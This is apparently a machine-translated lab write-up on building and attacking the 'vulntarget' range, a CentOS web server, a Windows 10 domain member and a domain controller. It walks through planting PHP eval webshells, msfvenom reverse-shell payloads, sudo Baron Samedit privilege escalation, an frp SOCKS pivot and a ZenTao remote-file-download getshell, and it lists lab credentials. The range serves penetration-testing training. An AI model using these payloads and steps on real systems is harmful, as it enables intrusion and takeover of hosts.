Environmental preparation

Update time ：2021.12.23

vulntarget It's a shooting range designed and built by the laboratory on Friday , It covers Web Loophole 、 Host vulnerability 、 Domain vulnerability 、 Industrial control loopholes .

github Address ：

https://github.com/crow821/vulntarget

Download address ：

Baidu cloud

link : https://pan.baidu.com/s/1Hdqkojmu-CeIuPr2gLWHwA

Extraction code :s4ka

Related vulnerability Technology

The acme cms Related loopholes 、
ZenTao cms Related loopholes 、
Tunnel agent 、
No killing 、
CVE-2021-1732 、
CVE-2021-42287/CVE-2021-42278

Network topology

Environment building process

centos7

 By  VMware  Product creation , But this product is different from this version  VMware Workstation  Are not compatible , So I can't use .
 virtualHW.version = "15"   my vm edition 

Account information

Two accounts ：root/root,vulntarget/root

edition ：uname -a


Already installed pagoda

yum install -y wget && wget -O install.sh http://download.bt.cn/install/install_6.0.sh && sh install.sh
 bt default

Check the pagoda web service

 ==================================================================
 Internet panel address : http://125.122.127.185:8888/045b2769
 Intranet panel address : http://10.30.7.70:8888/045b2769
username: rpngwb3l
password: b0db10cc
If you cannot access the panel,
release the following panel port [8888] in the security group
 If you can't access the panel , Please check the firewall / Does the security group have a release panel [8888] port 
==================================================================

Log in to the pagoda , install web service

install web

Upload the source code to the pagoda , Then add a website . The environment is ：nginx+mysql+php7.3

mysql Account density ：admin/EcfMrPrtTJGL2GjL

Direct access 81 Port installation begins web Environmental Science

The acme CMS

Open source free PHPCMS Website content management system , No commercial authorization , Simple and easy to use , Provide rich plug-ins ,
Help you build different types of websites with zero foundation ( Enterprise Station , Portal station , Personal blog station ), It is a good helper for you to build the station .
The call to the data output is completely free and open ,
Static... No need to configure the pseudo webmaster manually , It also supports configuring custom links in various formats .
The webmaster can output any data stored in the database at the front desk with its own static data cache ,
Static access efficiency can be achieved without updating and generating static pages. Upload picture management ,
Cache cleaning, etc , The acme cms It is convenient to manage the files of the server and has complete functions , The convenience of expansion is the ultimate cms Highlights of the station building system .

Fill in the account and password information , next step

Just install it directly

Home page information

Domain control 2016

Reference of domain control construction process vulntarget-a
The firewall is not off ,wdf It doesn't matter , Add a domain member account .

Account information

Domain ：vulntarget.com

Domain control account ：administrator

Domain control password ：[email protected]

Domain member account ：win101

Domain member password ：admin#123

ctrl+alt+Insert Unlock
Password has expired

Version information

The mirror image used ：cn_windows_server_2016_x64_dvd_9718765.iso

Domain members win10

Account information

Local account number ：win10

password ：win10#123

Administrators ：administrator password ：[email protected]

Domain members ：vulntarget\win101, password ：admin#123

web backstage :：admin , password ：Admin123

To join the domain

safety problem ： Is full of win10

To configure IP, Set up DNS Domain controlled IP

To join the domain , Enter the domain control account secret


restart , Log in as a member of the domain , The domain controller has been created ,win101

There is no set boot auto start , If set , The authority to win is system

Install 360 Security guards and 360 antivirus （ Virtual machine intranet does not kill ）

Change a tinder （5.0）

Use phpstudy To install , The authority you get is administrator Of
Change IIS To install web service , below phpstudy The installation of is directly enabled .

Use phpstudy 2018 To build web service

modify web The catalogue is ：\ZenTaoPMS.12.4.2\zentaopms\www

restart phpstudy, visit 127.0.0.1 Installation of Zen OA

ZenTao

The first domestic open source project management software ,
Her core management philosophy is based on agile methods scrum,
Built in product management and project management ,
At the same time, test management is supplemented according to the current situation of domestic R & D 、 Plan management 、 Release management 、 Document management 、 Functions such as transaction management ,
In one software, the requirements in software development can be 、 Mission 、bug、 Use cases 、 plan 、 Release and other elements are tracked and managed orderly , It completely covers the core process of project management .

Zen uses self-developed zentaophp Framework development ,
Built in complete extension mechanism ( Non simple hook ), Users can easily carry out thorough secondary development of Zen .
Zen also provides... For each page json Interface api, It is convenient for other languages to call interaction .
Built in multilingual support , Multi style support , Search function , Statistical functions and other practical functions .

5.4.45 Need to be used openssl Expand


wait for apache restart , Just refresh
There is no change here phpstudy Database password for , The default is root/root

Set a company name , Background account secret , First, it's simple admin/admin, After entering the background, there will be forced password changes

Change the password to [email protected]


complete

ISS install web service

Reference resources ：https://www.baishitou.cn/2430.html

First download three files , The download address is as follows ：

https://windows.php.net/downloads/releases/archives/php-5.4.45-nts-Win32-VC9-x86.zip
https://dev.mysql.com/get/Downloads/MySQL-5.5/mysql-5.5.62-winx64.msi
https://files.phpmyadmin.net/phpMyAdmin/4.4.12/phpMyAdmin-4.4.12-all-languages.7z

install ISS, In the control panel -> Programs and functions , Select enable live = Or turn off windwos function

Check on CGI, Click ok , Just wait for the download

Before configuring the mapping module , You need to first php decompression ,
modify php Configuration file for php.ini-development, Change its name to php.ini, Modify three parts ：
1. Extended Directory ：extension_dir, Remove the semicolon from the front , The catalog is changed to C:\inetpub\php\ext

2. The time zone date.timezone, It is amended as follows date.timezone = Asia/Shanghai

3.php Expand , take extension=php_ Remove all semicolons in front

Well preserved

Open with administrator privileges , Select new site .

Configure module mapping

Add module mapping

Add default document , take index.php add

Next install mysql database , Just follow the instructions given in the article , In addition to directories and so on , Basically, it is the default installation （https://www.baishitou.cn/2430.html）, Here, the account secret is set to root/root

Installation of Zen OA System , visit 127.0.0.1:8080

Default next step , Need to set writable permissions

Modify permissions accordingly ,
Right click the directory , attribute , Security , edit , Other directories are the same ,
The last one is session_save_path, Need modification php.ini file ,

Then give a directory writable permission ,
This is for the above C:\inetpub\zentao\zentaopms\tmp that will do
（ You may need to restart the host , If you restart iis If the service doesn't work ）.

When all are satisfied , Move on to the next step

database , The password for root

Create a new file directly according to , preservation


After preservation , next step , Set company name .

Delete file

The first time you enter the background, you need to change the password to a strong password , It is amended as follows Admin123

The network configuration

centos7

Bridging mode , Both internal and external networks are set to static IP

Intranet IP by ：10.0.20.33

Extranet IP by ：10.30.7.70（ Modify... According to the actual situation ）

Configuration file in ：/etc/sysconfig/network-scripts/

ifcfg-ens33（ Extranet , Modify according to your own network ）
End of configuration Restart it reboot

 TYPE=Ethernet
PROXY_METHOD=none
BROWSER_ONLY=no
BOOTPROTO=static
DEFROUTE=yes
IPV4_FAILURE_FATAL=no
IPV6INIT=yes
IPV6_AUTOCONF=yes
IPV6_DEFROUTE=yes
IPV6_FAILURE_FATAL=no
IPV6_ADDR_GEN_MODE=stable-privacy
NAME=ens33
UUID=0cc7b380-1eb6-43ad-9c2e-a80190b4017e
DEVICE=ens33
ONBOOT=yes
IPADDR=10.30.7.70          // modify 
NETMASK=255.255.248.0      // modify 
GATEWAY=10.30.0.1         // modify 
DNS1=8.8.8.8

ifcfg-ens37（ Intranet , There's no need to change ）

 TYPE=Ethernet
PROXY_METHOD=none
BROWSER_ONLY=no
BOOTPROTO=static
DEFROUTE=yes
IPV4_FAILURE_FATAL=no
IPV6INIT=yes
IPV6_AUTOCONF=yes
IPV6_DEFROUTE=yes
IPV6_FAILURE_FATAL=no
IPV6_ADDR_GEN_MODE=stable-privacy
NAME=ens37
DEVICE=ens37
ONBOOT=yes
IPADDR=10.0.20.33
NETMASK=255.255.255.0

Domain members win10

Also use two network cards , The first and centos signal communication , The second is communication with domain control

ping centos7：

ping win2016

Domain control win2016

ping win10, Firewall blocking

Test the network environment

Get the target , You need to modify it yourself VM Internet information , You can directly add two in the virtual network editor VM18 and 19 Of .

penetration

Open it directly

Port scanning

 nmap -v ip

81 Port is the ultimate homepage

Historical loopholes

backstage getshell

In the ultimate historical loophole , There's a backstage getshell

visit admin.php
admin/admin123 Log in to the background



There is a list of plug-ins in extension management , There are online editing plug-ins

Direct download , install , To configure

Just type in a password

Enter the password again and you will see the source code , And can be modified
modify index.php, Write a sentence directory

 eval($_POST[aming]);

Ant sword connection webshell

http://192.168.31.104:81/

After the ant sword is connected , Want to execute orders , Find direct ret=127, Can't execute command , Pagoda disable function

Directly use the ant sword plug-in bypass

see IP, It is found that there is another intranet IP

msf go online

msf Generate a reverse

 msfvenom -p linux/x64/meterpreter/reverse_tcp  lhost=10.30.7.77 LPORT=4444 -f elf > 4444.elf

msf monitor

 msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set lhost eth0
lhost => eth0
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.31.105:4444 

centos7 Raise the right

Add a route first

 meterpreter > run post/multi/manage/autoroute

[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: linux
[*] Running module against localhost.localdomain
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.31.0/255.255.255.0 from host's routing table.
meterpreter > 

Find out 10.0.20.0 paragraph

Find can power modular

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 192.168.31.104 - Collecting local exploits for x64/linux...
[*] 192.168.31.104 - 43 exploit checks are being tried...
[+] 192.168.31.104 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The service is running, but could not be validated.
[+] 192.168.31.104 - exploit/linux/local/ptrace_traceme_pkexec_helper: The target appears to be vulnerable.
[+] 192.168.31.104 - exploit/linux/local/sudo_baron_samedit: The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.

Use exploit/linux/local/sudo_baron_samedit

 meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/linux/local/sudo_baron_samedit
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/sudo_baron_samedit) > set session 1
session => 1
msf6 exploit(linux/local/sudo_baron_samedit) > options

Module options (exploit/linux/local/sudo_baron_samedit):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   SESSION      1                yes       The session to run this module on
   WritableDir  /tmp             yes       A directory where you can write files. Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.31.105   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


 

msf6 exploit(linux/local/sudo_baron_samedit) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)
   2   Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31) - alternative
   3   Ubuntu 19.04 x64 (sudo v1.8.27, libc v2.29)
   4   Ubuntu 18.04 x64 (sudo v1.8.21, libc v2.27)
   5   Ubuntu 18.04 x64 (sudo v1.8.21, libc v2.27) - alternative
   6   Ubuntu 16.04 x64 (sudo v1.8.16, libc v2.23)
   7   Ubuntu 14.04 x64 (sudo v1.8.9p5, libc v2.19)
   8   Debian 10 x64 (sudo v1.8.27, libc v2.28)
   9   Debian 10 x64 (sudo v1.8.27, libc v2.28) - alternative
   10  CentOS 8 x64 (sudo v1.8.25p1, libc v2.28)
   11  CentOS 7 x64 (sudo v1.8.23, libc v2.17)
   12  CentOS 7 x64 (sudo v1.8.23, libc v2.17) - alternative
   13  Fedora 27 x64 (sudo v1.8.21p2, libc v2.26)
   14  Fedora 26 x64 (sudo v1.8.20p2, libc v2.25)
   15  Fedora 25 x64 (sudo v1.8.18, libc v2.24)
   16  Fedora 24 x64 (sudo v1.8.16, libc v2.23)
   17  Fedora 23 x64 (sudo v1.8.14p3, libc v2.22)
   18  Manual

Although the attack failed （ Have a chance to succeed ）

 msf6 exploit(linux/local/sudo_baron_samedit) > set target 12
target => 12
msf6 exploit(linux/local/sudo_baron_samedit) > run

[*] Started reverse TCP handler on 192.168.31.105:4444 via the meterpreter on session 1
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.
[*] Writing '/tmp/I939SoiW.py' (23630 bytes) ...
[*] A successful exploit will create a new root user msf with password tljrisdzsagywsm
[*] Brute forcing ASLR (can take several minutes)...
[+] Success! Created new user msf with password tljrisdzsagywsm
[*] Writing '/tmp/xltJc' (266 bytes) ...
[!] /etc/passwd overwritten, but no session created.
[!] Manual cleanup of the new user in the /etc/passwd file is required.
[!] Take note of the username and password above - these should work to manually escalate privileges.
[*] Exploit completed, but no session was created.

But use msf This account , The password for mbmjsjyshkyndln You can log in remotely , And the authority is root

Rebound root jurisdiction shell

Reuse msf This account runs 4444.elf You can bounce back root Of shell

Domain members win 10

Get the Internet shell after , Add route , Detect the next hop address of the intranet

Using modules ：auxiliary/scanner/portscan/tcp

 ackground
[*] Backgrounding session 2...
msf6 auxiliary(scanner/portscan/tcp) > set session 2
session => 2
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 10.0.20.0/24
rhosts => 10.0.20.0/24
msf6 auxiliary(scanner/portscan/tcp) > set ports 21,22,80,135,139,445,8080
ports => 21,22,80,135,139,445,8080
msf6 auxiliary(scanner/portscan/tcp) > set threads 30
threads => 30
msf6 auxiliary(scanner/portscan/tcp) > run

 msf6 auxiliary(scanner/portscan/tcp) > run

[+] 10.0.20.30:           - 10.0.20.30:21 - TCP OPEN
[+] 10.0.20.30:           - 10.0.20.30:22 - TCP OPEN
[+] 10.0.20.30:           - 10.0.20.30:80 - TCP OPEN
[*] 10.0.20.0/24:         - Scanned  31 of 256 hosts (12% complete)
[*] 10.0.20.0/24:         - Scanned  61 of 256 hosts (23% complete)
[+] 10.0.20.66:           - 10.0.20.66:8080 - TCP OPEN
[*] 10.0.20.0/24:         - Scanned  89 of 256 hosts (34% complete)
[*] 10.0.20.0/24:         - Scanned 111 of 256 hosts (43% complete)
[*] 10.0.20.0/24:         - Scanned 140 of 256 hosts (54% complete)
[*] 10.0.20.0/24:         - Scanned 154 of 256 hosts (60% complete)
[*] 10.0.20.0/24:         - Scanned 182 of 256 hosts (71% complete)
[*] 10.0.20.0/24:         - Scanned 214 of 256 hosts (83% complete)
[*] 10.0.20.0/24:         - Scanned 245 of 256 hosts (95% complete)
[*] 10.0.20.0/24:         - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

The same network segment is detected IP：10.0.20.66,8080 Port open

frp agent

msf Ant sword , Uploading a larger file often reports an error , So use frp The agent should be stable

stay kali function frps,frps.ini The configuration file is

[common]
bind_ip = ip   //kali IP
bind_port = 7000

 function ：./frps -c frps.ini 

frpc Upload to centos, The configuration file is
frpc.ini

[common]
server_addr = kali ip
server_port = 7000

[socks_proxy]
type = tcp
remote_port =8888
plugin = socks5

./frpc -c frpc.ini

ZenTao backstage getshell

agent frp Traffic visit 8080 port ,admin/Admin123 Backstage

ZenTao OA 12.4.2 in , because download Medium downloadZipPackage Function filtering is not rigorous , have access to ftp,HTTP The agreement bypasses .

Write the Trojan horse to centos in

echo "<?php @eval(\$_REQUEST['x']); ?> " >1.php     // Use POST No ant sword connected , You can try it yourself 
// pit 
echo ^<?php @eval($_REQUEST[1]);?^> > index.php
 <?php eval($_POST['aming']);?>

Turn on python Of http service

python -c 'import pty; pty.spawn("/bin/bash")'  // Interactive 
python -m SimpleHTTPServer 4567

Use Base64 encryption http link

HTTP://10.0.20.31:4567/1.php   // Capitalization 


SFRUUDovLzEwLjAuMjAuMzE6NDU2Ny8xLnBocA==

visit http://10.0.20.66:8080/client-download-1-SFRUUDovLzEwLjAuMjAuMzE6NDU2Ny8xLnBocA==-1.html

Found out because it was IIS Deployed direct parsing file , Find out what to do html file does not exist

Change Zen backstage another EXP, Found successfully saved

http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzM6NDU2Ny8xLnBocA==

visit ,http://10.0.20.66:8080/data/client/1/1.php , Display server error

Ant sword can be connected , Use frp Agent for

Don't kill tinder msf go online

What I wanted to do was to avoid killing 360 Of , Result Intranet 360 Security guards and 360 Antivirus doesn't work in virtual machines

Using tools directly can avoid killing tinder

msf Generate exe

┌──(rootamingMM)-[/home/amingmm/Desktop]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.31.105 lport=4758 -f exe > /home/amingmm/Desktop/4758.exe